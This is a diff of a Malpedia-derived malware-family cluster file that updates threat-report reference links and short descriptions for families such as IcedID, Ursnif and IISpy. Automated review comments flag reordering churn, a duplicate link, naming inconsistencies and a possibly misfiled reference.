+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/",
+ "https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://www.youtube.com/watch?v=oZ4bwnjcXWg",
 "https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/",
+ "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html",
+ "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b",
+ "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
+ "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/",
+ "https://tccontre.blogspot.com/2021/01/",
+ "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html",
+ "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims",
+ "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/",
+ "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://github.com/telekom-security/icedid_analysis",
+ "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid",
+ "https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/",
+ "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/",
+ "https://thedfirreport.com/2021/05/12/conti-ransomware/",
+ "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
+ "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766",
+ "https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/",
+ "https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240",
+ "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html",
+ "https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/",
+ "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
+ "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917",
+ "https://blog.reconinfosec.com/an-encounter-with-ta551-shathak",
+ "https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html",
+ "https://blog.minerva-labs.com/icedid-maas",
+ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites",
+ "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders",
+ "https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf",
+ "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html",
+ "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/",
+ "https://www.youtube.com/watch?v=YEqLIR6hfOM",
+ "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
 "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/",
 "https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/",
 "https://github.com/f0wl/deICEr",
- "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/",
- "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766",
- "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/",
- "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
- "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html",
+ "https://netresec.com/?b=214d7ff",
 "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
- "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html",
 "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/",
- "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b",
- "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/",
- "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html",
- "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
- "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/",
- "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://www.group-ib.com/blog/icedid",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html",
+ "https://blog.group-ib.com/prometheus-tds",
+ "https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/",
+ "https://malwation.com/icedid-malware-technical-analysis-report/",
 "https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back"
 ],
 "synonyms": [
@@ -18161,6 +20801,7 @@
 "description": "",
 "meta": {
 "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart",
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart"
 ],
 "synonyms": [
@@ -18189,7 +20830,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/"
+ "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf",
+ "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/",
+ "https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/"
 ],
 "synonyms": [],
 "type": []
@@ -18197,6 +20841,21 @@
 "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6",
 "value": "IISniff"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.iispy",
+ "https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/"
+ ],
+ "synonyms": [
+ "BadIIS"
+ ],
+ "type": []
+ },
+ "uuid": "74afd7ae-8349-4186-9c85-82a45a2486c9",
+ "value": "IISpy"
+ },
 {
 "description": "",
 "meta": {
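Review bot: Most of this IcedID hunk is the existing refs list emitted in a new order — `youtube.com/watch?v=wObF9n2UIAM`, `group-ib.com/blog/icedid`, the Microsoft Digital Defense Report and some thirty other URLs are removed and re-added unchanged — which buries the references that are genuinely new and makes the change very hard to review; the HawkEye, Houdini, HelloKitty and final Ursnif/Gozi hunks show the same churn. Presumably the list is regenerated from an unordered source; having the generator sort `refs` (or keep existing order and append) would reduce future diffs to real additions. Among the re-added lines, `"https://tccontre.blogspot.com/2021/01/"` is a monthly archive page rather than a specific article, so it is worth replacing with the permalink of the post that was meant.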
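Review bot: In the IcyHeart hunk the added `"https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart",` is byte-identical to the line that follows it, so the entry now lists the same reference twice; drop the added line. A uniqueness check on `refs` in the generator or in CI would catch this class of mistake before it reaches the cluster.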
@@ -18217,11 +20876,14 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat",
 "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://www.politie.nl/nieuws/2021/mei/19/04-aanhouding-in-onderzoek-naar-cybercrime.html",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
 "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/",
 "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
- "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/"
+ "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt"
 ],
 "synonyms": [],
 "type": []
@@ -18230,7 +20892,7 @@
 "value": "Imminent Monitor RAT"
 },
 {
- "description": "",
+ "description": "ZScaler describes Immortal Stealer as a windows malware written in .NET designed to steal sensitive information from an infected machine. The Immortal stealer is sold on the dark web with different build-based subscriptions.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.immortal_stealer",
@@ -18299,7 +20961,7 @@
 "value": "Inferno"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.infodot",
@@ -18309,7 +20971,7 @@
 "type": []
 },
 "uuid": "e0ce5055-45cd-46d2-971f-bb3904ec43a1",
- "value": "InfoDot Ransomware"
+ "value": "InfoDot"
 },
 {
 "description": "",
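Review bot: The new Immortal Stealer description has `windows malware` where the OS name should be capitalised, spells the family two ways in consecutive sentences (`Immortal Stealer` and `The Immortal stealer`), and writes the vendor as `ZScaler` although the company styles its name `Zscaler`; `"Zscaler describes Immortal Stealer as a Windows malware written in .NET designed to steal sensitive information from an infected machine. Immortal Stealer is sold on the dark web with different build-based subscriptions."` keeps the content and fixes all three. The InfoDot hunk further down sets `"description": "Ransomware."`, which adds nothing beyond the name; one sentence from the cited report, or leaving the field empty until there is one, would serve consumers better.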
@@ -18380,6 +21042,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole",
 "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/",
 "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
 "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"
 ],
 "synonyms": [],
@@ -18426,25 +21089,32 @@
 "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
 "https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy",
 "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html",
+ "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/",
 "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware",
 "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
 "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
 "https://lokalhost.pl/gozi_tree.txt",
+ "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
+ "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
 "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245",
 "https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/",
 "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html",
- "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
- "https://www.cyberbit.com/new-ursnif-malware-variant/",
+ "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
+ "https://securityintelligence.com/posts/ursnif-cerberus-android-malware-bank-transfers-italy/",
 "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html",
+ "https://www.cyberbit.com/new-ursnif-malware-variant/",
 "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
- "https://www.youtube.com/watch?v=KvOpNznu_3w",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
 "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/",
+ "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/",
 "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/",
 "https://www.youtube.com/watch?v=jlc7Ahp8Iqg",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
 "http://benkow.cc/DreambotSAS19.pdf",
 "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html",
 "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/",
@@ -18452,34 +21122,44 @@
 "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
 "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15",
 "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/",
- "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
 "https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/",
+ "https://www.proofpoint.com/us/blog/security-briefs/ta544-targets-italian-organizations-ursnif-malware",
 "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/",
 "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/",
 "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
 "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html",
 "https://www.tgsoft.it/files/report/download.asp?id=568531345",
 "https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
 "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
 "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
 "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
+ "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/",
 "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
 "https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/",
 "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/",
 "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
 "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
 "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html",
 "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb",
 "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/",
 "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/",
+ "https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
 "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
 "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
 "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features",
 "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
 "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
 "https://github.com/mlodic/ursnif_beacon_decryptor",
+ "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html",
+ "https://www.youtube.com/watch?v=KvOpNznu_3w",
 "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
 "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
 "https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass"
@@ -18499,6 +21179,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia",
 "http://www.clearskysec.com/ismagent/",
 "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/"
@@ -18570,11 +21251,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace",
- "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/",
 "https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-express",
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/",
+ "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
 "https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/",
- "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
- "https://www.secureworks.com/research/threat-profiles/bronze-express"
+ "https://www.secureworks.com/research/threat-profiles/bronze-overbrook"
 ],
 "synonyms": [
 "NfLog RAT"
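Review bot: The `csecybsec.com` reference added in the second hunk is, going by its path (`CSE_APT28_X-Agent_Op-Roman%20Holiday-Report`), an APT28 X-Agent report, while every other reference in this ISSPace entry concerns DragonOK/NfLog; it is worth confirming the document actually covers ISSPace before merging, since a mis-filed reference sends analysts pivoting on it to the wrong family. If the cross-reference is intentional, a short note in the commit message saying why would save the next reviewer the same question. The enclosing cluster object continues outside the hunk.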
@@ -18656,6 +21338,20 @@
 "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112",
 "value": "Jaku"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.janeleiro",
+ "https://www.welivesecurity.com/2021/04/06/janeleiro-time-traveler-new-old-banking-trojan-brazil/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2ebce129-d59e-401c-9259-9009d9b2d50f",
+ "value": "Janeleiro"
+ },
 {
 "description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.",
 "meta": {
@@ -18700,7 +21396,7 @@
 "value": "JCry"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jeno",
@@ -18713,7 +21409,7 @@
 "type": []
 },
 "uuid": "a1d7e117-4ca9-4d67-a4dd-53626827ed2f",
- "value": "Jeno Ransomware"
+ "value": "Jeno"
 },
 {
 "description": "Cisco Talos identified JhoneRAT in January 2020. The RAT is delivered through cloud services (Google Drive) and also submits stolen data to them (Google Drive, Twitter, ImgBB, GoogleForms). The actors using JhoneRAT target Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.",
@@ -18790,6 +21486,19 @@
 "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6",
 "value": "Joao"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jobcrypter",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/jobcrypter-ransomware-with-new-routines-for-encryption-desktop-screenshots"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "30c047ea-27c9-4b01-8532-bcaa661be85f",
+ "value": "win.JobCrypter"
+ },
 {
 "description": "",
 "meta": {
@@ -18835,11 +21544,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jsoutprox",
- "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/",
 "https://twitter.com/zlab_team/status/1208022180241530882",
- "https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese"
+ "https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat",
+ "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/",
+ "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese",
+ "https://yoroi.company/research/financial-institutions-in-the-sight-of-new-jsoutprox-attack-waves/"
 ],
 "synonyms": [],
 "type": []
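Review bot: The new JobCrypter entry's `"value"` is `"win.JobCrypter"`, which leaks the Malpedia family-id prefix into the display name that the cluster tag is generated from; every other entry added in this commit uses the bare family name (`"Janeleiro"`, `"Joao"` just above). Suggest `"value": "JobCrypter"` — the `win.jobcrypter` id is already preserved by the Malpedia link in `refs`.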
@@ -18852,7 +21562,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader",
- "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf"
+ "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf",
+ "https://www.proofpoint.com/us/blog/threat-insight/jssloader-recoded-and-reloaded",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/"
 ],
 "synonyms": [],
 "type": []
@@ -18866,7 +21578,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato",
 "https://github.com/ohpe/juicy-potato",
- "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf"
+ "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf",
+ "https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/"
 ],
 "synonyms": [],
 "type": []
@@ -18892,9 +21605,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jupyter",
- "https://redcanary.com/blog/yellow-cockatoo/",
+ "https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer",
+ "https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html",
 "https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction",
- "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/"
+ "https://blog.minerva-labs.com/new-iocs-of-jupyter-stealer",
+ "https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more",
+ "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/",
+ "https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/",
+ "https://redcanary.com/blog/yellow-cockatoo/"
 ],
 "synonyms": [],
 "type": []
@@ -18967,10 +21685,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff",
+ "https://mp.weixin.qq.com/s/o_EVjBVN2sQ1q7cl4rUXoQ",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
+ "https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/",
 "https://www.secureworks.com/research/threat-profiles/cobalt-edgewater",
 "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html",
- "https://blog.yoroi.company/research/karkoff-2020-a-new-apt34-espionage-operation-involves-lebanon-government/",
- "https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/"
+ "https://blog.yoroi.company/research/karkoff-2020-a-new-apt34-espionage-operation-involves-lebanon-government/"
 ],
 "synonyms": [
 "CACTUSPIPE",
@@ -18981,6 +21701,19 @@
 "uuid": "a45c16d9-6945-428c-af46-0436903f9329",
 "value": "Karkoff"
 },
+ {
+ "description": "Ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karma",
+ "https://blog.cyble.com/2021/08/24/a-deep-dive-analysis-of-karma-ransomware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2667c9a6-4811-4535-95a1-3b75ba853a03",
+ "value": "karma"
+ },
 {
 "description": "",
 "meta": {
@@ -19005,6 +21738,8 @@
 "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
 "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
 "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
+ "https://youtu.be/SW8kVkwDOrc?t=24706",
 "https://securelist.com/sunburst-backdoor-kazuar/99981/"
 ],
 "synonyms": [],
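Review bot: The new Karma entry in the second hunk uses a lowercase `"value": "karma"` while every neighbouring value is written as a proper name (`"Karkoff"` just above, `"KEKW"`, `"Kimsuky"` further down), and the value is what ends up in the generated tag and in the UI. If the Malpedia display name is `Karma`, the value should match it; otherwise a short note on why the lowercase form is deliberate would help.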
@@ -19027,7 +21762,7 @@
 "value": "Kegotip"
 },
 {
- "description": "",
